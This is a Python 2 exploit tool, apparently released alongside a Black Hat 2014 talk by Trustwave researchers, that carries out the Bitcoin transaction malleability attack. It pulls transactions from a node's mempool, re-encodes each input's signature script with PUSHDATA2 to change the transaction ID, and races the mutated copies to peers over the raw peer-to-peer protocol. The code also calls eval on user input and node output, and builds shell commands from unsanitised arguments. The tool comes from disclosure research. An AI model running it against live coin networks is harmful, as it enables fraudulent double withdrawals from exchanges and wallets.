import deserialize
from BCDataStream import *
import os
import logging
import sys
import utils
import hashlib
import socket
import time
import random

# Using this tool is on your own responsibility, any damage or lose caused to and/or by yourself or to any network will be on your own responsiblity, DONT NOT use this tool to violate any law or terms.

# This tool may be used to simulate the process of the attacked publicly known as "bitcoin tranasction meallability"
# Please Use this tool only for testing on your own coin network.
# The tool requires python bitcoin tools & libraries which can be download from https://github.com/gavinandresen/bitcointools
# We hope you enjoyed our session at Blackhat US 2014
# https://www.blackhat.com/us-14/briefings.html#bitcoin-transaction-malleability-theory-in-practice
# @danielchechik @benhayak http://blog.spiderlabs.com (Trustwave.com)

# IMPORTANT INSTRUCTIONS:
# This tool was tested only on Mac OS, and under a testing enviroment (private coin network).
# This tool was tested using private coin network with magic 0xddb7d9fc.
# This tool was tested using protocolversion 60002
# In order for this tool to "win the race condition" it's required to open bitcoin client (or any coin client),
# and make sure it's connected to the peers that generated the transaction you want to mutate.
#
# How to use
# example: python coin_malleability.py --version=78 --address=YSanSyuaUeuFcdxjaQHxUFKffwLf9UsMjD --coind=/[PATH]/src/mycoin --peers=peers.txt --magic=0xddb7d9fc --rpc_version=60002


def main():
	import optparse
	parser = optparse.OptionParser(usage="%prog [options]")
	parser.add_option("--txid", dest="txid", default=None,
	                help="Enter the transaction ID if known")
	parser.add_option("--address", dest="address", default=None,
	                help="Enter your wallet address - to mutate only the transaction that was sent to your wallet address")
	parser.add_option("--version", dest="version", default=0,
	                help="The version is the currency's prefix integer, Required only when --address was provided. Check  https://en.bitcoin.it/wiki/List_of_address_prefixes ")
	parser.add_option("--coind", dest="coind", default=None,
	                help="Enter the full path of the program that implements the protocol (e.g. bitcoind)")
	parser.add_option("--peers", dest="peers", default=None,
	                help="Enter the full path of the peers list file (list file format should include IP:PORT of each peer in a new line). The mutated transactions will be sent to those peers. If you don't want to relay the mutated transaction set --peers 0")
	parser.add_option("--magic", dest="magic", default="0xd9b4bef9",
	                help="Enter the suitable little endian magic value, (e.g. for Bitcoin:0xd9b4bef9)")
	parser.add_option("--rpc_version", dest="rpc_version", default=60002,
	                help="Enter the program protocol version (e.g. bitcoind 60002) appears as 'protocolversion' under $ bitcoind getinfo")
	(options, args) = parser.parse_args()
	
	magic = eval(options.magic)

	if options.peers is None:
		logging.error("Please enter the full path of the peers list file or 0")
		sys.exit(1)

	if options.address is None and options.txid is None:
		logging.error("Please enter Transaction ID or wallet address")
		sys.exit(1)

	if not options.txid is None:
		has_tran = True
	else:
		has_tran = False

	if (options.coind is None):
		logging.error("Please enter the full path of coind (the program that implements the protocol)")
		sys.exit(1)
	else:
		if not os.path.isfile(options.coind):
			logging.error("File: " + str(options.coind) + " does not exists")
			sys.exit(1)

	malleability_trans = {}
	# mutate a specific transaction if provided, or else search the entire mempool
	if has_tran:
		 malleability_tran = convert_Transaction(options.txid, options.coind)
		 malleability_txid = hashlib.sha256(hashlib.sha256(malleability_tran.decode('hex')).digest()).digest()
		 malleability_txid = malleability_txid[::-1].encode('hex')
		 malleability_trans[malleability_txid] = malleability_tran
	else:
		malleability_trans = search_Mempool(options.address, options.coind, options.version)

	# check if marked to send the new transactions to peers or not
	if options.peers != "0" and os.path.isfile(options.peers):
		f = open(options.peers)
		lines = f.readlines()
		f.close()

		for line in lines:
			line =line.strip(' \r\n')

			if (line != ""):
				line = line.split(":")
				ip = line[0]
				port = line[1]

				send_Transaction(ip, port, magic, malleability_trans, int(options.rpc_version))

	else:
		# just print the mutated transactions
		for txid in malleability_trans:
			print "-------------------"
			print "New transaction ID: " + str(txid) 
			print "New mutated transaction: " + str(malleability_trans[txid])
	

# send mutated transaction to peer
def send_Transaction(ip, port, magic, malleability_trans, rpc_version):
	try:
		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		sock.settimeout(5)
		#sock.connect(("192.168.2.103", 51001))
		sock.connect((ip, int(port)))
		
		#print aa
		#print " ".join(hex(ord(n)) for n in aa)
		print "send version to peer: " + str(ip)
		sock.send(send_Version_Message(ip, int(port), magic, rpc_version))
		data = sock.recv(1000) # receive version
		print "verison : " + data

		# running over every transaction and send to peer (can send multiple transactions to peer)
		for txid in malleability_trans:
			try:
				print "send tx id " + txid
				sock.send(send_Inv_Message(txid, magic))

				data = sock.recv(1000)

				header = data[:24]
				payload = data[24:]

				print "send tx data"
				print malleability_trans[txid]
				sock.send(send_Tx_Message(malleability_trans[txid].decode('hex'), magic))
				data = sock.recv(1000)

			except socket.timeout, e:
				print "peer ignored our request (next tx)" + str(e)
			except socket.error, e:
				print "socket error (next tx): " + str(e) 
		#data = sock.recv(1000) # receive verack
		#print "verack : " + data
		sock.close()
	except socket.timeout, e:
		print "peer ignored our request " + str(e)
	except socket.error, e:
		print "socket error : " + str(e) 

# search transaction
def search_Mempool(address, coind, version):
	#read mempool
	p = os.popen(str(coind) + " getrawmempool")
	mem_pool = p.readlines()
	p.close()

	mem_pool = eval("".join(mem_pool))
	malleability_trans = {}

	vds = BCDataStream()
	# read transactions
	for tx_id in mem_pool:
		tx_raw = read_Transaction(coind, tx_id)

		vds.clear()
		vds.write(tx_raw.decode('hex'))

		parsed_tran = deserialize.parse_Transaction(vds)

		# read txOut to check if your wallet address is there
		for txOut in parsed_tran['txOut']:

			# parse scriptPubKey
			txOut_address = parse_PubKey(txOut['scriptPubKey'].encode('hex'), version)
			#print "address: " + str(txOut_address)

			# check if the correct transaction was found 
			if address == txOut_address:
				#print "transaction id: " + tx_id
				malleability_tran = convert_Transaction(tx_id, coind)
				malleability_txid = hashlib.sha256(hashlib.sha256(malleability_tran.decode('hex')).digest()).digest()
		 		malleability_txid = malleability_txid[::-1].encode('hex')
		 		malleability_trans[malleability_txid] = malleability_tran

	return malleability_trans

def parse_PubKey(scriptPubKey, version):

	#check if the first opcode is OP_HASH160
	if scriptPubKey[:2] == hex(deserialize.opcodes.OP_DUP).split('x')[1]:
		scriptPubKey = scriptPubKey[2:]

	#check if the first opcode is OP_HASH160
	if scriptPubKey[:2] == hex(deserialize.opcodes.OP_HASH160).split('x')[1]:
		scriptPubKey = scriptPubKey[2:]

	#check if the second opcode is 14 
	if scriptPubKey[:2] == '14':
		scriptPubKey = scriptPubKey[2:]

	# check if last byte is OP_CHECKSIG
	if scriptPubKey[-2:] == hex(deserialize.opcodes.OP_CHECKSIG).split('x')[1]:
		scriptPubKey = scriptPubKey[:-2]

	# check if the last byte is OP_EQUALVERIFY
	if scriptPubKey[-2:] == hex(deserialize.opcodes.OP_EQUALVERIFY).split('x')[1]:
		scriptPubKey = scriptPubKey[:-2]

	#print "AAA " + str(len(scriptPubKey)) 
	# check if the pubKey is 20 bytes, otherwise the format is a bit different 
	if len(scriptPubKey) == 40:
		return utils.base58CheckEncode(int(version), scriptPubKey.decode('hex'))
	else:
		return ""

def read_Transaction(coind, txid):
	#read raw transaction
	
	p = os.popen(str(coind) + " getrawtransaction " + str(txid))
	tx_raw = p.readline()
	p.close()

	tx_raw = tx_raw.strip(' \n\r')

	return tx_raw
# tran id input
def convert_Transaction(txid, coind):
	
	tx_raw = read_Transaction(coind, txid)
	
	vds = BCDataStream()
	vds.clear()
	vds.write(tx_raw.decode('hex'))

	parsed_tran = deserialize.parse_Transaction(vds)

	#print scriptSig

	return write_Transaction(parsed_tran)

# recreate transaction raw (crafted)
def write_Transaction(original_tran):
	mutated_tx = BCDataStream()
	mutated_tx.clear()
	
	mutated_tx.write_int32(original_tran['version'])
	mutated_tx.write_compact_size(len(original_tran['txIn']))

	# add every txIn to Tran
	for i in range(len(original_tran['txIn'])):
		mutated_tx.write(original_tran['txIn'][i]['prevout_hash'])
		mutated_tx.write_uint32(original_tran['txIn'][i]['prevout_n'])

		# write mutated tran (PUSHDATA2)
		scriptSig=("4d" + original_tran['txIn'][i]['scriptSig'].encode('hex')[:2] + "00" + original_tran['txIn'][i]['scriptSig'].encode('hex')[2:]).decode('hex')
		mutated_tx.write_compact_size(len(scriptSig))
		mutated_tx.write(scriptSig)

		mutated_tx.write_uint32(original_tran['txIn'][i]['sequence'])
	
	mutated_tx.write_compact_size(len(original_tran['txOut']))

	# add every txOut
	for i in range(len(original_tran['txOut'])):
		mutated_tx.write_int64(original_tran['txOut'][i]['value'])
		mutated_tx.write_compact_size(len(original_tran['txOut'][i]['scriptPubKey']))
		mutated_tx.write(original_tran['txOut'][i]['scriptPubKey'])
		
	mutated_tx.write_uint32(original_tran['lockTime'])

	return mutated_tx.input.encode('hex')

# rpc protocol for sending messages to peers
def make_Message(magic, command, payload):
    checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[0:4]
    return struct.pack('I12sI4s', magic, command, len(payload), checksum) + payload

# send version message to peer
def send_Version_Message(ip_address, port, magic, rpc_version):

    version = rpc_version
    services = 1
    timestamp = int(time.time())
    addr_me = utils.netaddr(socket.inet_aton(socket.gethostbyname(socket.gethostname())), port)
    addr_you = utils.netaddr(socket.inet_aton(ip_address), port)
    nonce = random.getrandbits(64)
    sub_version_num = utils.varstr('')
    start_height = 0

    payload = struct.pack('<LQQ26s26sQsL', version, services, timestamp, addr_me,
        addr_you, nonce, sub_version_num, start_height)

    return make_Message(magic, 'version', payload)

# send Inv, a number of tx you are about to send along with the txid
def send_Inv_Message(tx_id, magic):

    payload_inv = utils.varint(1) + struct.pack('<L', 1) + tx_id.decode('hex')[::-1]
    return make_Message(magic, 'inv', payload_inv)

# send tx with data
def send_Tx_Message(tx_data, magic):
    return make_Message(magic, 'tx', tx_data)

if __name__ == '__main__':
    main()


